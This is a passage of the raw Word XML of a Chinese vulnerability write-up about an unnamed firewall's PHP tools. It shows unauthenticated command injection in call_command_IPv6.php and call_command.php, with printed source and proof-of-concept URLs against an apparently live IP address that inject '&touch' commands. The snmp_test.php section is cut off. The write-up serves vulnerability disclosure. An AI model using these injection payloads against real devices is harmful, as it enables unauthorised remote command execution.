              </w:rPr>
              <w:t>?&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE04DE" w:rsidRDefault="00DE04DE" w:rsidP="00DE04DE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/Program/Tools/call_command_IPv6.php</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>文件，源代码如下：</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE04DE" w:rsidRDefault="00DE04DE" w:rsidP="00DE04DE">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="4753438" cy="21057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018" cy="2111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DE04DE" w:rsidP="00DE04DE">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>从这里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行可以看出，执行系统命令</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>ping6</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>命令时候没有任何判断，将参数</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>ipv6</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>拼接到命令中直接执行；</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE04DE" w:rsidRDefault="00DE04DE" w:rsidP="00DE04DE">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>漏洞复现参数构造：</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE04DE" w:rsidRDefault="00DE04DE" w:rsidP="00DE04DE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字符拼接命令，需要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编码，漏洞利用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：</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE04DE" w:rsidRDefault="00F42917" w:rsidP="00DE04DE">
            <w:hyperlink r:id="rId9" w:history="1">
              <w:r w:rsidR="00DE04DE">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:hint="eastAsia"/>
                </w:rPr>
                <w:t>https://220.163.251.198/Program/Tools/call_command_IPv6.php?ipv6=127.0.0.1%26touch%20888ip.txt</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w:rsidR="00DE04DE" w:rsidRDefault="00DE04DE" w:rsidP="00DE04DE">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="4819306" cy="148590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426" cy="1487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DE04DE" w:rsidP="00DE04DE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新建文件命令，新建文本</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>888ip.txt</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE04DE" w:rsidRDefault="00DE04DE" w:rsidP="00DE04DE">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74A25C8E" wp14:editId="6E0F506A">
                  <wp:extent cx="4813300" cy="1866127"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0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07" cy="186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4DE" w:rsidRPr="0048285C" w:rsidRDefault="00DE04DE" w:rsidP="00DE04DE">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0048285C">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>二</w:t>
            </w:r>
            <w:r w:rsidRPr="0048285C">
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="0048285C">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>缺陷文件：</w:t>
            </w:r>
            <w:r w:rsidRPr="0048285C">
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>/Program/Tools/call_command.php</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE04DE" w:rsidRDefault="00DE04DE" w:rsidP="00DE04DE">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>首先</w:t>
            </w:r>
            <w:r w:rsidR="002E0123">
              <w:t>XXXXXXXXXXXX</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>系列防火墙系统是需要登录才能操作的</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE04DE" w:rsidRDefault="00DE04DE" w:rsidP="00DE04DE">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>通过读取系统源码知道了每个文件的带有：</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE04DE" w:rsidRDefault="00DE04DE" w:rsidP="00DE04DE">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>$AdminUser-&gt;checkLogin()</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>变量验证登录状态的。使用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搜索语法筛选出不包括该变量的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文件，</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE04DE" w:rsidRDefault="00DE04DE" w:rsidP="00DE04DE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/Program/Tools/call_command.php</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>文件，源代码如下：</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE04DE" w:rsidRDefault="00DE04DE" w:rsidP="00DE04DE">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>&lt;?</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE04DE" w:rsidRDefault="00DE04DE" w:rsidP="00DE04DE">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>include_once("/PDATA/apache/class/Comm.php");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>if(isset($_GET["fl"])) {</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE04DE" w:rsidRDefault="00DE04DE" w:rsidP="00DE04DE">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:tab/>
              <w:t>if(is_file("/tmp/$_GET[fl]"))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file_get_contents("/tmp/$_GET[fl]");</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE04DE" w:rsidRDefault="00DE04DE" w:rsidP="00DE04DE">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:tab/>
              <w:t>} else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"null";</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE04DE" w:rsidRDefault="00DE04DE" w:rsidP="00DE04DE"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>} else {</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE04DE" w:rsidRDefault="00DE04DE" w:rsidP="00DE04DE">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:tab/>
              <w:t>$sn = time();</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE04DE" w:rsidRDefault="00DE04DE" w:rsidP="00DE04DE">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:tab/>
              <w:t>$filename = "ping_result_{$sn}";</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE04DE" w:rsidRDefault="00DE04DE" w:rsidP="00DE04DE">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:tab/>
              <w:t>$ping_interface = get_ethinfo($_GET["p_wp"], $_GET["p_ip"]);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ab/>
              <w:t>$fp = fopen("/tmp/{$filename}.sh", "w");</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE04DE" w:rsidRDefault="00DE04DE" w:rsidP="00DE04DE">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:tab/>
              <w:t>fwrite($fp, "#!/bin/sh\n");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for($i = 1; $i &lt;= $_GET["p_count"]; $i++)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 = array();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$runCmd[] = "/PGRAM/ping -s $_GET[p_pkts] -c 1 -i $_GET[p_wait] -I $ping_interface $_GET[p_ip] -w $_GET[p_wait] &gt; /tmp/{$filename}_{$i}"; </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE04DE" w:rsidRDefault="00DE04DE" w:rsidP="00DE04DE">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">    $runCmd[] = "if [ $? -eq 0 ]; then";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if($i == 1) {</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE04DE" w:rsidRDefault="00DE04DE" w:rsidP="00DE04D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$runCmd[] = "  /bin/sed -n '1,1p' /tmp/{$filename}_{$i} &gt;&gt; /tmp/{$filename}";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/bin/sed -n '2,2p' /tmp/{$filename}_{$i} | /bin/sed 's/icmp_seq=1/icmp_seq={$i}/g' &gt;&gt; /tmp/{$filename}";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sleep $_GET[p_wait]";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"else";</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE04DE" w:rsidRDefault="00DE04DE" w:rsidP="00DE04DE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ab/>
              <w:t>if($i == 1) {</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE04DE" w:rsidRDefault="00DE04DE" w:rsidP="00DE04D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>$runCmd[] = "  /bin/sed -n '1,1p' /tmp/{$filename}_{$i} &gt;&gt; /tmp/{$filename}";</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE04DE" w:rsidRDefault="00DE04DE" w:rsidP="00DE04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  /bin/echo 'time out' &gt;&gt; /tmp/{$filename}";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"fi";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$runCmd[] = "";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fwrite($fp, implode("\n", $runCmd));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fwrite($fp, "sleep 5\n");</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE04DE" w:rsidRDefault="00DE04DE" w:rsidP="00DE04DE">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:tab/>
              <w:t>fwrite($fp, "/bin/rm /tmp/{$filename}*\n");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fclose($fp);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE04DE" w:rsidRDefault="00DE04DE" w:rsidP="00DE04DE">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:tab/>
              <w:t>exec("/bin/chmod 755 /tmp/{$filename}.sh");</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE04DE" w:rsidRDefault="00DE04DE" w:rsidP="00DE04DE">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:tab/>
              <w:t>exec("/bin/nohup /tmp/{$filename}.sh &gt; /dev/null 2&gt;&amp;1 &amp;");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echo $filename;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE04DE" w:rsidRDefault="00DE04DE" w:rsidP="00DE04DE">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>}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>/**</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE04DE" w:rsidRDefault="00DE04DE" w:rsidP="00DE04DE">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> * Function</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE04DE" w:rsidRDefault="00DE04DE" w:rsidP="00DE04DE">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> */</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE04DE" w:rsidRDefault="00DE04DE" w:rsidP="00DE04DE">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>function  get_ethinfo($dev, $dstIP){</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE04DE" w:rsidRDefault="00DE04DE" w:rsidP="00DE04DE">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:tab/>
              <w:t>if($dev=="eth0" || $dev=="eth1" || $dev=="eth2" || $dev=="eth3" || $dev=="eth4" || $dev=="eth5" || $dev=="eth6" || $dev=="eth01" || $dev=="eth02" || $dev=="eth03"){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//find out their own subnet getway ip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exec("/sbin/ip route | grep $dev", $ret);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foreach((Array)$ret as $line)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unset($match);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if(preg_match('/([0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)\/([0-9]+) dev eth0?[0-6]  proto kernel  scope link  src ([0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)/', $line, $match)) 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$AA = ip2long($match[1]) &gt;&gt; (32 - $match[2]);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$BB = ip2long($dstIP) &gt;&gt; (32 - $match[2]);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if($AA == $BB) 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$match[3];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//default getway ip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$cmd = "ip addr show ".$dev;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unset($msg);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE04DE" w:rsidRDefault="00DE04DE" w:rsidP="00DE04D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unset($str1);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unset($str2);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exec($cmd,$msg);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$str1 =  explode(" ",trim($msg[1]));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$str2 =  explode(" ",trim($msg[2]));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$ipt = explode("/",$str2[1]);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$ipt[0];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"ppp4000"){</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE04DE" w:rsidRDefault="00DE04DE" w:rsidP="00DE04DE">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve">  return get_pppbydev($dev);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"ppp4001"){</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE04DE" w:rsidRDefault="00DE04DE" w:rsidP="00DE04DE">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve">  return get_pppbydev($dev);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"ppp4002"){</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE04DE" w:rsidRDefault="00DE04DE" w:rsidP="00DE04DE">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve">  return get_pppbydev($dev);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"ppp4003"){</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE04DE" w:rsidRDefault="00DE04DE" w:rsidP="00DE04DE">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve">  return get_pppbydev($dev);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"ppp4004"){</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE04DE" w:rsidRDefault="00DE04DE" w:rsidP="00DE04DE">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve">  return get_pppbydev($dev);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE04DE" w:rsidRDefault="00DE04DE" w:rsidP="00DE04DE">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:tab/>
              <w:t>}else if($dev == "br0"){</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE04DE" w:rsidRDefault="00DE04DE" w:rsidP="00DE04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$dev;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:tab/>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE04DE" w:rsidRDefault="00DE04DE" w:rsidP="00DE04DE">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:tab/>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE04DE" w:rsidRDefault="00DE04DE" w:rsidP="00DE04DE">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE04DE" w:rsidRDefault="00DE04DE" w:rsidP="00DE04DE"/>
          <w:p w:rsidR="00DE04DE" w:rsidRDefault="00DE04DE" w:rsidP="00DE04DE">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>function get_pppbydev($dev){</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE04DE" w:rsidRDefault="00DE04DE" w:rsidP="00DE04DE">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:tab/>
              <w:t>$cmd = "ip addr show dev ".$dev;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE04DE" w:rsidRDefault="00DE04DE" w:rsidP="00DE04DE">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:tab/>
              <w:t>unset($msg);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE04DE" w:rsidRDefault="00DE04DE" w:rsidP="00DE04DE">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:tab/>
              <w:t>exec($cmd,$msg);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE04DE" w:rsidRDefault="00DE04DE" w:rsidP="00DE04DE">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:tab/>
              <w:t>$str1 =  explode(" ",trim($msg[1]));</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE04DE" w:rsidRDefault="00DE04DE" w:rsidP="00DE04DE">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:tab/>
              <w:t>$str2 =  explode(" ",trim($msg[2]));</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE04DE" w:rsidRDefault="00DE04DE" w:rsidP="00DE04DE">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:tab/>
              <w:t>$ipt = explode("/",$str2[1]);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE04DE" w:rsidRDefault="00DE04DE" w:rsidP="00DE04DE">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:tab/>
              <w:t>return $ipt[0];</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE04DE" w:rsidRDefault="00DE04DE" w:rsidP="00DE04DE">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE04DE" w:rsidRDefault="00DE04DE" w:rsidP="00DE04DE">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>?&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE04DE" w:rsidRDefault="00DE04DE" w:rsidP="00DE04DE">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="4712249" cy="107323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882" cy="1077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DE04DE" w:rsidP="00DE04DE">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>从这里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行可以看出，执行系统命令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命令时候没有任何判断，将参数</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>p_pkts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p_wait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p_ip</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>拼接到命令中直接执行；</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE04DE" w:rsidRDefault="00DE04DE" w:rsidP="00DE04DE">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>漏洞复现参数构造：</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE04DE" w:rsidRDefault="00DE04DE" w:rsidP="00DE04DE">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="4778151" cy="260913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328" cy="261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DE04DE" w:rsidP="00DE04DE">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>全局搜索指定参数后发现</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>/Program/Tools/ping_ip.php</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>了解到各个参数功能作用，</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>p_pkts</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>等于设置封包大小值（默认</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>32Bytes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p_ip</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>等于目标地址、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p_wp</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
                <w:color w:val="FF00FF"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>等于通信接口、</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>p_wait</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>等于等待时间、</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>p_count</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>回应次数。</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE04DE" w:rsidRDefault="00DE04DE" w:rsidP="00DE04DE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字符拼接命令，需要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编码，漏洞利用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：</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE04DE" w:rsidRDefault="00DE04DE" w:rsidP="00DE04DE">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">https://220.163.251.198/Program/Tools/call_command.php?p_ip=127.0.0.1&amp;p_pkts=32&amp;p_count=10&amp;p_wait=2%26touch%20ccc.txt&amp;p_wp=eth1 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="4786389" cy="188151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609" cy="188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DE04DE" w:rsidP="00DE04DE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新建文件命令，新建文本</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>ccc.txt</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE04DE" w:rsidRDefault="00DE04DE" w:rsidP="00DE04DE">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="4695773" cy="167762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053" cy="168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4DE" w:rsidRDefault="0048285C" w:rsidP="00DE04DE">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00974A4A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>三</w:t>
            </w:r>
            <w:r w:rsidRPr="00974A4A">
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="00974A4A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>缺陷文件：</w:t>
            </w:r>
            <w:r w:rsidRPr="00974A4A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>/Program/Tools/snmp_test.php</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00974A4A" w:rsidRDefault="00974A4A" w:rsidP="00974A4A">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>首先</w:t>
            </w:r>
            <w:r w:rsidR="002E0123">
              <w:t>xxxxxxx</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>系列防火墙系统是需要登录才能操作的</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00974A4A" w:rsidRDefault="00974A4A" w:rsidP="00974A4A">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>通过读取系统源码知道了每个文件的带有：</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00974A4A" w:rsidRDefault="00974A4A" w:rsidP="00974A4A">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>$AdminUser-&gt;checkLogin()</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>变量验证登录状态的。使用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搜索语法筛选出不包括该</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>变量的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文件，</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00974A4A" w:rsidRDefault="00974A4A" w:rsidP="00974A4A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/Program/Tools/snmp_test.php</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>文件，源代码如下：</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00974A4A" w:rsidRDefault="00974A4A" w:rsidP="00974A4A">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>&lt;?</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00974A4A" w:rsidRDefault="00974A4A" w:rsidP="00974A4A">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>include_once("/PDATA/apache/class/Comm.php");</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00974A4A" w:rsidRDefault="00974A4A" w:rsidP="00974A4A"/>
          <w:p w:rsidR="00974A4A" w:rsidRDefault="00974A4A" w:rsidP="00974A4A">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>$ip = $_GET["switch_ip"];</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00974A4A" w:rsidRDefault="00974A4A" w:rsidP="00974A4A">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>$read = $_GET["switch_read"];</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00974A4A" w:rsidRDefault="00974A4A" w:rsidP="00974A4A">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>$oid = $_GET["switch_oid"];</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00974A4A" w:rsidRDefault="00974A4A" w:rsidP="00974A4A">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>$vlan = (trim($_GET["switch_vlan"]) == "") ? "" : "@".$_GET["switch_vlan"];</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00974A4A" w:rsidRDefault="00974A4A" w:rsidP="00974A4A">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>$next_oid = $_GET["switch_nextOid"];</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00974A4A" w:rsidRDefault="00974A4A" w:rsidP="00974A4A"/>
          <w:p w:rsidR="00974A4A" w:rsidRDefault="00974A4A" w:rsidP="00974A4A">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
